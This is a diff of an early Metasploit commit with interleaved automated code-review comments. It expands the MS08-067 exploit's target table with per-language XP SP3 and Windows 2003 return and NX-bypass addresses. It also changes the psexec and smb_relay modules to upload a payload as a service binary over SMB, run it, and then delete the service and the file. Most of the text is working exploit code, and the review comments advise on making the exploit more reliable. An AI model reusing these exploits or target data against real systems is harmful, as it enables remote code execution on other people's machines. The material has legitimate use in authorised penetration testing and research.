The psexec and smb_relay modules now automatically clean up after themselves. The ms08-06 module now supports all languages of XP SP3.
git-svn-id: file:///home/svn/framework3/trunk@5841 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
d573c31be9
commit
0881649f14
@ -387,12 +387,12 @@ module Exploit::Remote::SMB
|
|||
[
|
||||
Rex::Text.to_unicode('Remotedrucker')
|
||||
],
|
||||
'Portugese - Brazilian' =>
|
||||
'Portuguese - Brazilian' =>
|
||||
[
|
||||
Rex::Text.to_unicode('Impr. remotas Windows NT'),
|
||||
Rex::Text.to_unicode('Impressoras remotas do Windows NT')
|
||||
],
|
||||
'Portguese' =>
|
||||
'Portuguese' =>
|
||||
[
|
||||
Rex::Text.to_unicode('Imp. remotas do Windows NT')
|
||||
],
|
||||
@ -67,6 +67,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#
|
||||
[ 'Automatic Targeting', { 'auto' => true } ],
|
||||
|
||||
|
||||
#
|
||||
# UNIVERSAL TARGETS
|
||||
#
|
||||
|
||||
#
|
||||
# Antoine's universal for Windows 2000
|
||||
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
|
||||
|
@ -82,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Standard return-to-ESI without NX bypass
|
||||
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
|
||||
#
|
||||
[ 'Windows XP SP0/SP1 Universal (NO NX)',
|
||||
[ 'Windows XP SP0/SP1 Universal',
|
||||
{
|
||||
'Ret' => 0x01001361,
|
||||
'Scratch' => 0x00020408,
|
||||
|
@ -90,8 +95,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], # JMP ESI SVCHOST.EXE
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# ENGLISH TARGETS
|
||||
#
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 English (NX)',
|
||||
{
|
||||
'Ret' => 0x6f88f727,
|
||||
|
@ -100,9 +107,70 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 English (NX)',
|
||||
{
|
||||
'Ret' => 0x6f88f807,
|
||||
'DisableNX' => 0x6F8917C2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Standard return-to-ESI without NX bypass
|
||||
[ 'Windows 2003 SP0 English (NO NX)',
|
||||
{
|
||||
'Ret' => 0x71bf175f,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
|
||||
|
||||
# Standard return-to-ESI without NX bypass
|
||||
[ 'Windows 2003 SP1 English (NO NX)',
|
||||
{
|
||||
'Ret' => 0x71bf21a2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
|
||||
# Brett Moore's crafty NX bypass for 2003 SP1
|
||||
[ 'Windows 2003 SP1 English (NX)',
|
||||
{
|
||||
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
|
||||
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
|
||||
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
|
||||
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
],
|
||||
|
||||
# Standard return-to-ESI without NX bypass
|
||||
[ 'Windows 2003 SP2 English (NO NX)',
|
||||
{
|
||||
'Ret' => 0x71bf3969,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
|
||||
# Brett Moore's crafty NX bypass for 2003 SP2
|
||||
[ 'Windows 2003 SP2 English (NX)',
|
||||
{
|
||||
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
|
||||
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
|
||||
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
|
||||
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
],
|
||||
|
||||
|
||||
#
|
||||
# NON-ENGLISH TARGETS
|
||||
#
|
||||
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 French (NX)',
|
||||
{
|
||||
'Ret' => 0x595bf727,
|
||||
|
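Review bot: The table now mixes two key schemas with nothing saying how the exploit picks between them: the XP entries use `'Ret'`/`'Scratch'` plus an optional `'DisableNX'`, while the moved `Windows 2003 SP1 English (NX)` and `SP2 English (NX)` entries use `'RetDec'`/`'RetPop'`/`'JmpESP'`/`'DisableNX'`; presumably the exploit code outside this hunk branches on which keys are present. A short comment above `# Brett Moore's crafty NX bypass for 2003 SP1`, along the lines of `# Targets carrying RetDec/RetPop/JmpESP take the 2003 ROP-style path; every other target uses the single Ret` (adjusted to what the exploit code actually does), would stop the next contributor from guessing which keys a new target needs. The targets array both starts and ends outside this hunk.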
@ -127,7 +195,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
|
||||
#
|
||||
[ 'Windows XP SP2 Portuguese (Brazil) (NX)',
|
||||
[ 'Windows XP SP2 Portuguese - Brazilian (NX)',
|
||||
{
|
||||
'Ret' => 0x596ff727,
|
||||
'DisableNX' => 0x597016e2,
|
||||
|
@ -150,7 +218,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by sunwear <shellcoder[at]hotmail.com>
|
||||
#
|
||||
[ 'Windows XP SP2 Chinese - Traditional (NX)',
|
||||
[ 'Windows XP SP2 Chinese - Simplified (NX)',
|
||||
{
|
||||
'Ret' => 0x58fcda43,
|
||||
'DisableNX' => 0x58fc16e2,
|
||||
|
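Review bot: The new label `'Windows XP SP2 Chinese - Simplified (NX)'` switches this target from Traditional to Simplified while `'Ret' => 0x58fcda43` and `'DisableNX' => 0x58fc16e2` are unchanged, so this is presumably correcting a mislabel rather than adding new addresses. If the original label was the correct one, automatic targeting will now hand Simplified-Chinese hosts the Traditional addresses and crash svchost, and there is no SP2 Traditional target left in the table. Please record the basis for the relabel in the existing credit comment, e.g. `# Target provided by sunwear <...> (originally listed as Traditional; acgenral.dll confirmed as the Simplified Chinese build)`, adjusted to whatever was actually verified.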
@ -168,18 +236,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
#
|
||||
[ 'Windows XP SP3 English (NX)',
|
||||
{
|
||||
'Ret' => 0x6f88f807,
|
||||
'DisableNX' => 0x6F8917C2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ulises2k <ulises2k[at]gmail.com>
|
||||
|
@ -203,11 +259,56 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Russian (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f807,
|
||||
'DisableNX' => 0x6fe217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Russian
|
||||
[ 'Windows XP SP3 Czech (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f807,
|
||||
'DisableNX' => 0x6fe217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Turkish (NX)',
|
||||
{
|
||||
'Ret' => 0x5a78f807,
|
||||
'DisableNX' => 0x5a7917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Swedish (NX)',
|
||||
{
|
||||
'Ret' => 0x597af807,
|
||||
'DisableNX' => 0x597b17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Portuguese (NX)',
|
||||
{
|
||||
'Ret' => 0x596bf807,
|
||||
'DisableNX' => 0x596c17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
|
||||
#
|
||||
[ 'Windows XP SP3 Portugese - Brazilian (NX)',
|
||||
[ 'Windows XP SP3 Portuguese - Brazilian (NX)',
|
||||
{
|
||||
'Ret' => 0x596ff807,
|
||||
'DisableNX' => 0x597017c2,
|
||||
|
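Review bot: The five new XP SP3 targets (Russian, Czech, Turkish, Swedish, Portuguese) carry no provenance, unlike the Brazilian entry later in the hunk that has `# Target provided by Ramon de C. Valle`, and Czech is justified only by `# Same as Russian`. A wrong return address in this module crashes svchost on the victim rather than failing cleanly, so each entry should record where its acgenral.dll base came from, e.g. `# Verified against acgenral.dll <file version> from the <language> XP SP3 install`. If the Czech addresses were assumed to equal the Russian ones rather than checked on a Czech build, the comment should say so explicitly.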
@ -215,61 +316,133 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Standard return-to-ESI without NX bypass
|
||||
#
|
||||
[ 'Windows 2003 SP0 English (NO NX)',
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Portuguese
|
||||
[ 'Windows XP SP3 Italian (NX)',
|
||||
{
|
||||
'Ret' => 0x71bf175f,
|
||||
'Ret' => 0x596bf807,
|
||||
'DisableNX' => 0x596c17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Standard return-to-ESI without NX bypass
|
||||
#
|
||||
[ 'Windows 2003 SP1 English (NO NX)',
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Polish (NX)',
|
||||
{
|
||||
'Ret' => 0x71bf21a2,
|
||||
'Ret' => 0x5941f807,
|
||||
'DisableNX' => 0x594217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Standard return-to-ESI without NX bypass
|
||||
#
|
||||
[ 'Windows 2003 SP2 English (NO NX)',
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Norwegian (NX)',
|
||||
{
|
||||
'Ret' => 0x71bf3969,
|
||||
'Ret' => 0x597cf807,
|
||||
'DisableNX' => 0x597d17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI WS2HELP.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Brett Moore's crafty NX bypass for 2003 SP1
|
||||
#
|
||||
[ 'Windows 2003 SP1 English (NX)',
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Korean (NX)',
|
||||
{
|
||||
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
|
||||
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
|
||||
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
|
||||
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
|
||||
'Ret' => 0x6fd6f807,
|
||||
'DisableNX' => 0x6fd717c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
],
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Brett Moore's crafty NX bypass for 2003 SP2
|
||||
#
|
||||
[ 'Windows 2003 SP2 English (NX)',
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Japanese (NX)',
|
||||
{
|
||||
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
|
||||
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
|
||||
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
|
||||
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
|
||||
'Ret' => 0x567fd4d2,
|
||||
'DisableNX' => 0x568017c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
]
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Hungarian (NX)',
|
||||
{
|
||||
'Ret' => 0x5970f807,
|
||||
'DisableNX' => 0x597117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Hebrew (NX)',
|
||||
{
|
||||
'Ret' => 0x5940f807,
|
||||
'DisableNX' => 0x594117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Finnish (NX)',
|
||||
{
|
||||
'Ret' => 0x597df807,
|
||||
'DisableNX' => 0x597e17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Greek (NX)',
|
||||
{
|
||||
'Ret' => 0x592af807,
|
||||
'DisableNX' => 0x592b17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Danish (NX)',
|
||||
{
|
||||
'Ret' => 0x5978f807,
|
||||
'DisableNX' => 0x597917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Simplified (NX)',
|
||||
{
|
||||
'Ret' => 0x58fbf807,
|
||||
'DisableNX' => 0x58fc17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Traditional (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Chinese Traditional
|
||||
[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Arabic (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd8f807,
|
||||
'DisableNX' => 0x6fd917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Missing Targets
|
||||
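Review bot: The trailing gadget comments on the new SP3 targets disagree about what lives at the shared `Ret` offset: Italian, Polish, Norwegian and Korean are annotated `# JMP ESI ACGENRAL.DLL`, Hungarian, Hebrew and Finnish `# PUSH ESI; RET ACGENRAL.DLL`, and Greek, Danish, both Chinese and Arabic `# CALL ESI ACGENRAL.DLL`, yet every one of them uses a `Ret` ending in `f807` with a `DisableNX` ending in `17c2`, i.e. the same two RVAs against a 64 KiB-aligned base. Assuming these are the same acgenral.dll image relocated per language pack, which the identical low 16 bits suggest, at most one of the three descriptions is right; only Japanese (`'Ret' => 0x567fd4d2`) plausibly sits on a different gadget. Since these comments are the only record of what the addresses do, please check one build in a disassembler and make the annotations agree (the earlier `# JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL` vs `NX/NX BYPASS` wording should be unified at the same time). The targets array continues outside this hunk.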
@ -191,7 +191,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rescue ::Exception => e
|
||||
end
|
||||
|
||||
|
||||
##
|
||||
# OpenServiceW
|
||||
##
|
||||
|
@ -211,12 +210,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
|
||||
# print_line(" ")
|
||||
# print_status("You *MUST* manually remove the service: (#{servicename} - \"#{displayname}\")")
|
||||
# print_status("You *MUST* manually delete the service file: %SYSTEMROOT%\\#(unknown)")
|
||||
# print_line(" ")
|
||||
|
||||
##
|
||||
# StartService()
|
||||
##
|
||||
|
@ -234,12 +227,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
|
||||
##
|
||||
# Give the process time to initialize
|
||||
##
|
||||
print_status("Waiting on process to initialize...")
|
||||
|
||||
##
|
||||
# DeleteService()
|
||||
##
|
||||
|
@ -254,7 +241,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Error: #{e}")
|
||||
end
|
||||
|
||||
|
||||
##
|
||||
# CloseHandle()
|
||||
##
|
||||
|
@ -265,7 +251,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Error: #{e}")
|
||||
end
|
||||
|
||||
|
||||
print_status("Deleting \\#(unknown)...")
|
||||
simple.connect("ADMIN$")
|
||||
simple.delete("\\#(unknown)")
|
||||
@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Uploading payload...")
|
||||
filename = rand_text_alpha(8) + ".exe"
|
||||
fd = rclient.open("\\#(unknown)", 'rwct')
|
||||
fd << Rex::Text.to_win32pe(code.encoded)
|
||||
fd << Rex::Text.to_win32pe_service(code.encoded,rand_text_alpha(8))
|
||||
fd.close
|
||||
print_status("Created \\#(unknown)...")
|
||||
|
||||
|
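Review bot: The new `fd << Rex::Text.to_win32pe_service(code.encoded,rand_text_alpha(8))` hands the service stub a fresh random name that has no relation to the `servicename = rand_text_alpha(8)` later registered via CreateService. For a SERVICE_WIN32_OWN_PROCESS binary the SCM ignores the dispatcher-table name, so this probably works, but if `to_win32pe_service` embeds the name anywhere else the two will disagree and the installed service becomes harder to correlate with the dropped binary during cleanup or a later investigation. Generate `servicename` before the upload and pass it here, `fd << Rex::Text.to_win32pe_service(code.encoded, servicename)`, so one name appears in the binary, in the SCM and in the log output. The enclosing method continues outside this hunk.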
@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
##
|
||||
|
||||
servicename = rand_text_alpha(8)
|
||||
displayname = 'M' + rand_text_alpha(rand(32)+1)
|
||||
displayname = rand_text_alpha(rand(32)+1)
|
||||
svc_handle = nil
|
||||
svc_status = nil
|
||||
|
||||
|
@ -227,11 +227,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
print_line(" ")
|
||||
print_status("You *MUST* manually remove the service: #{smb[:rhost]} (#{servicename} - \"#{displayname}\")")
|
||||
print_status("You *MUST* manually delete the service file: #{smb[:rhost]} %SYSTEMROOT%\\#(unknown)")
|
||||
print_line(" ")
|
||||
|
||||
##
|
||||
# StartService()
|
||||
##
|
||||
|
@ -249,7 +244,33 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Error: #{e}")
|
||||
end
|
||||
|
||||
handler(smb[:rsock])
|
||||
##
|
||||
# DeleteService()
|
||||
##
|
||||
print_status("Removing the service...")
|
||||
stubdata =
|
||||
svc_handle
|
||||
begin
|
||||
response = dcerpc.call(0x02, stubdata)
|
||||
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
||||
end
|
||||
rescue ::Exception => e
|
||||
print_status("Error: #{e}")
|
||||
end
|
||||
|
||||
##
|
||||
# CloseHandle()
|
||||
##
|
||||
print_status("Closing service handle...")
|
||||
begin
|
||||
response = dcerpc.call(0x0, svc_handle)
|
||||
rescue ::Exception => e
|
||||
print_status("Error: #{e}")
|
||||
end
|
||||
|
||||
print_status("Deleting \\#(unknown)...")
|
||||
simple.connect("ADMIN$")
|
||||
simple.delete("\\#(unknown)")
|
||||
end
|
||||
|
||||
|
||||
|
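Review bot: The DeleteService result is never inspected: the `if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)` block in the new cleanup has an empty body, so a failed RDeleteService (access denied, or the service already marked for deletion) is logged as if the service were removed and it survives on the host. RDeleteService returns only a DWORD status, so `rc = dcerpc.last_response.stub_data[0,4].unpack('V')[0]` followed by `print_error("DeleteService failed with code #{rc}") if rc != 0` inside that branch would surface it. The closing `simple.delete(...)` is also the only cleanup step not wrapped in begin/rescue; if the service process still has the image open the delete raises after the session is already established, so guard it like the other steps and print the failure instead of unwinding out of the exploit. The surrounding `rescue ::Exception => e` clauses also swallow Interrupt; `rescue ::StandardError` would let the operator abort a hung cleanup.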
@ -324,7 +345,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
target_host = smb[:ip]
|
||||
end
|
||||
|
||||
|
||||
rsock = nil
|
||||
rport = nil
|
||||
[445, 139].each do |rport|
|
||||
|
@ -363,7 +383,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
raise e
|
||||
end
|
||||
|
||||
|
||||
if (not rclient.client.challenge_key)
|
||||
print_error("No challenge key received from #{smb[:ip]}:#{rport}")
|
||||
rsock.close
|
||||